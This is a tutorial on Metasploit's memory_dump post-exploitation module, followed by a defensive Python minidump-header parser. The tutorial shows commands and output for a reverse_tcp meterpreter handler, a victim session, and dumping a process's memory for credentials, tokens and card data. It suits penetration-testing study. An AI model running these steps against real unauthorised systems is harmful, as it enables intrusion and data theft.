Process Memory Dump
Introduction
Metasploit contains a post-exploitation module that dumps the memory of a running process. It is normally used to recover information held in process memory, such as usernames and passwords, session tokens, and credit card data.
Step-by-Step Guide
1. Create the meterpreter binary
How-To: Creating a Meterpreter Binary
2. Open Metasploit Console
msfconsole
3. Create and run a listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 172.28.99.163:9999
[*] Sending stage (175686 bytes) to 172.28.96.1
[*] Meterpreter session 1 opened (172.28.99.163:9999 -> 172.28.96.1:11322) at 2024-01-24 11:14:18 +1100
meterpreter >
4. Execute your meterpreter binary on the victim computer
5. Check for the target process to dump (e.g. AcroRd32.exe)
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
236 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
312 296 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
316 452 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
360 296 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
368 352 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
396 352 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
452 360 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
468 360 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
476 360 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
564 452 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
648 452 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
720 452 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
792 452 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
820 452 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
996 452 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1036 452 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1064 452 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1212 1724 AcroRd32.exe x86 1 WIN7-1\win7 C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
...
6. Use the 'post/windows/gather/memory_dump' module to dump the process memory.
Command: run post/windows/gather/memory_dump PID=<Process PID>
meterpreter > run post/windows/gather/memory_dump PID=1212
[*] Running module against WIN7-1 (192.168.0.166)
[*] Dumping memory for AcroRd32.exe (pid: 1212) to C:\Users\win7\AppData\Local\Temp\bfleZlzWhtk
[*] Downloading minidump (8.50 MiB)
[+] Memory dump stored at /root/.msf4/loot/20240131125804_default_192.168.0.166_windows.process._803063.bin
[*] Deleting minidump from disk
The dump file is automatically saved and transferred to the /root/.msf4/loot/ directory. As the output shows, the module first writes the minidump to the target's temporary directory, downloads it, and then deletes it from the target's disk.
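The file the module stores in loot (and the temporary file it briefly writes on the target) is a Windows minidump. The following Python example is added here and is not part of the original page or of Metasploit: it parses the minidump header and stream directory so a practitioner can confirm that a .bin in loot is a genuine dump, or triage a stray dump file found on a host; the sample bytes are constructed in the code and carry no stream bodies.

```python
import struct
from collections import namedtuple

# Layout of MINIDUMP_HEADER and MINIDUMP_DIRECTORY (public Windows dbghelp
# structures); every field is little-endian.
MDMP_SIGNATURE = b"MDMP"
HEADER_FMT = "<4sHHIIIIQ"  # Signature, Version, ImplVersion, NumberOfStreams,
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
DIR_FMT = "<III"  # StreamType, DataSize, Rva
DIR_SIZE = struct.calcsize(DIR_FMT)

# Subset of the documented stream types a process minidump usually carries.
STREAM_NAMES = {3: "ThreadListStream", 4: "ModuleListStream", 5: "MemoryListStream",
                7: "SystemInfoStream", 9: "Memory64ListStream"}

MinidumpInfo = namedtuple("MinidumpInfo", "num_streams timestamp streams")


def parse_minidump_header(data):
    """Check the MDMP signature and return the stream directory.

    Raises ValueError for anything that is not a minidump, so a caller can
    tell a genuine dump from an arbitrary .bin file without trusting its name.
    """
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a minidump header")
    sig, _ver, _impl, n_streams, dir_rva, _csum, ts, _flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError("missing MDMP signature")
    if dir_rva + n_streams * DIR_SIZE > len(data):
        raise ValueError("stream directory runs past end of data")
    streams = []
    for i in range(n_streams):
        stype, size, rva = struct.unpack_from(DIR_FMT, data, dir_rva + i * DIR_SIZE)
        streams.append((STREAM_NAMES.get(stype, "Unknown(%d)" % stype), size, rva))
    return MinidumpInfo(n_streams, ts, streams)


def build_sample_minidump():
    """Constructed sample: a valid header plus a 3-entry directory; stream bodies omitted."""
    entries = [(7, 56, 68), (4, 0x100, 124), (5, 0x2000, 380)]
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, 0xA793, 0, len(entries),
                         HEADER_SIZE, 0, 0x65B0C6E0, 0)
    return header + b"".join(struct.pack(DIR_FMT, *e) for e in entries)


if __name__ == "__main__":
    info = parse_minidump_header(build_sample_minidump())
    for name, size, rva in info.streams:
        print("%-20s size=%-6d rva=%d" % (name, size, rva))
```

Run it against a real loot file by passing the file's bytes to parse_minidump_header; a file in the target's temp directory that starts with MDMP is a dump artifact worth investigating.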
Reference
https://www.infosecmatter.com/metasploit-module-library/?mm=post/windows/gather/memory_dump
